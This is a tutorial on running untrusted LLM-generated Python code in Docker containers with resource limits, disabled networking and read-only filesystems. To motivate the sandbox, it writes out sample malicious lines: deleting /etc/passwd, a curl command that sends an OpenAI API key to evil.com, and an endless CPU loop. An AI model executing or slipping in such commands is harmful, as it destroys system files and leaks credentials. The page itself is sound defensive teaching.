Sandboxing with Docker and RestrictedPython
Create isolated execution environments using Docker containers with resource limits, network isolation, and read-only filesystems to safely run untrusted LLM-generated code.
Why Code Sandboxing Is Non-Negotiable
LLM-generated code runs with the same permissions as the process that executes it. A careless or maliciously injected snippet can delete files, read environment variables containing API keys, make network requests, exhaust memory or CPU, or install backdoors. Sandboxing runs the code in an isolated environment that limits what it can do, and that isolation is what makes code execution agents safe enough to run in production.
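A minimal demonstration of that first claim, assuming the agent executes generated code in-process with Python's built-in exec(). DEMO_API_KEY is a made-up stand-in for a real secret. Passing exec() a fresh, empty globals dict looks like isolation but is not: Python inserts __builtins__ automatically, so the generated code can still import os and read the host environment.

```python
import os

# Hypothetical stand-in secret; in a real agent this could be an API key
os.environ['DEMO_API_KEY'] = 'sk-demo-123'

# "Generated" code that is never handed the os module by us
generated_code = "leaked = __import__('os').environ['DEMO_API_KEY']"

# An empty globals dict is not a sandbox: exec() adds __builtins__,
# so __import__ is still reachable and the code runs with our privileges
namespace: dict = {}
exec(generated_code, namespace)
print(namespace['leaked'])
```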
# Example of dangerous code an LLM might generate
import os
import subprocess
# Without sandboxing, this runs with full host permissions:
os.remove('/etc/passwd')  # deletes a critical system file (if the process runs as root)
subprocess.run(['curl', 'http://evil.com', '-d', os.environ['OPENAI_API_KEY']])  # exfiltrates secrets
while True: pass  # exhausts CPU
# A sandbox blocks or contains all of these
Docker as a Sandbox
Docker containers are a practical sandbox for LLM-generated code in production. Each execution gets a fresh container started from a minimal image, with strict limits on CPU, memory, and run time. The container has no access to the host filesystem (except an explicit workspace mount), and network access is either disabled or restricted to an allowlist. When execution completes, the container is destroyed.
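import os
import tempfile
import docker
import requests
client = docker.from_env()
def execute_in_docker(code: str, timeout: int = 30) -> tuple[str, str]:
    """Run untrusted Python code in a throwaway container and return (stdout, stderr)."""
    # Write the code to a temp file that is mounted read-only into the container
    with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
        f.write(code)
        host_path = f.name
    container = None
    try:
        container = client.containers.run(
            image='python:3.11-slim',  # minimal Python image
            command='python /workspace/code.py',
            volumes={host_path: {'bind': '/workspace/code.py', 'mode': 'ro'}},
            mem_limit='256m',          # max 256 MB RAM
            cpu_period=100000,
            cpu_quota=50000,           # 50% of one CPU core
            network_disabled=True,     # no network access
            read_only=True,            # read-only root filesystem
            detach=True,               # return immediately so the timeout can be enforced
        )
        try:
            # containers.run() has no timeout argument; Container.wait() does
            container.wait(timeout=timeout)
        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectionError):
            container.kill()           # stop runaway code such as `while True: pass`
            return '', f'Execution timed out after {timeout} s'
        # Collect both streams, whether the script succeeded or failed
        stdout = container.logs(stdout=True, stderr=False).decode('utf-8', errors='replace')
        stderr = container.logs(stdout=False, stderr=True).decode('utf-8', errors='replace')
        return stdout, stderr
    finally:
        if container is not None:
            container.remove(force=True)  # always delete the container
        os.unlink(host_path)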
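The relationship between cpu_period and cpu_quota is easy to get wrong: Docker's CFS scheduler lets the container run for cpu_quota microseconds in every cpu_period microseconds, so 50000 out of 100000 means half of one core. The sketch below, assuming you want all limits defined in one place, converts human-readable settings into run() keyword arguments. SandboxLimits and to_run_kwargs are hypothetical helpers (not part of docker-py), and pids_limit is an extra hardening setting the example above does not use.

```python
from dataclasses import dataclass

# Docker's default CFS period: 100,000 microseconds (100 ms)
CPU_PERIOD_US = 100_000

@dataclass(frozen=True)
class SandboxLimits:
    """Hypothetical settings object; not part of the docker SDK."""
    memory_mb: int = 256
    cpus: float = 0.5       # share of one core; may exceed 1.0 on multi-core hosts
    network: bool = False
    read_only: bool = True
    pids_limit: int = 64    # extra hardening: caps the process count (e.g. fork bombs)

def to_run_kwargs(limits: SandboxLimits) -> dict:
    """Translate limits into keyword arguments for client.containers.run()."""
    return {
        'mem_limit': f'{limits.memory_mb}m',
        'cpu_period': CPU_PERIOD_US,
        # quota / period = share of one core per scheduling period
        'cpu_quota': round(limits.cpus * CPU_PERIOD_US),
        'network_disabled': not limits.network,
        'read_only': limits.read_only,
        'pids_limit': limits.pids_limit,
    }
```

With this helper, a call such as client.containers.run(image='python:3.11-slim', command='python /workspace/code.py', detach=True, **to_run_kwargs(SandboxLimits())) applies the same limits as the literal arguments above, plus the process cap. docker-py also accepts nano_cpus (CPUs multiplied by 1e9), the SDK counterpart of docker run --cpus, as an alternative to the period/quota pair.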